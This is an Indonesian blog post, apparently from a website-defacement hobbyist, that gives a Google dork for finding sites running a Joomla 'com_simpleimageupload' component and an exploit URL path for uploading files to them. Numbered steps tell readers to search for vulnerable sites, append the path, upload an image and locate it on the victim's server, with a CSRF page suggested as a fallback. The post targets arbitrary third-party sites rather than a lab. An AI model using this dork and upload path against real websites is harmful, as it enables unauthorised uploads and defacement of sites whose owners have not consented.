![[+]Welcome in my blog[+]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglrKoaaZgPzCzXIQ2vx7By8wi12BbKwWiQrqVllyLpIhCd3b3YCoicKZjGRREpDg28Uk9irNK58AbxP31x7vwVqfKGOmt5smSOWFfxa-Q4NiOsgFyhPXvyzjcf3QdHmOvjSLgpTJOvfks/s1600-r/coollogo_com-16239576.gif)
DORK : inurl:option=com_simpleimageupload (Kembangin sendiri dorknya) Exploit : /index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc CSRF:TOUCH ME Oke langsung saja gan copy dorknya seacrh di google 1.cari web vuln yang menurut anda bisa di upload
2.Setelah memilih web akan ada tampilan seperti berikut
3.masukan exploitnya di bekalang http://site.domain.site/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc
4.Setelah di masukan Exploitnya makan akan sama dengan gambar no 2,masukan file
kamu ingat file yang digunakan hanya file yang berformat foto saja yang lain
tidak bisa.
5.jika sudah di upload bagaimana melihat file kita ? lihat yang saya blok dengan kotak merah itu lah hasil kamu
bagai mana cukup mudah bukan ?
NB:jika tidak bisa di exploit gunakan CSRF ada di atas nya tinggal di coopy saja
Tidak ada komentar:
Posting Komentar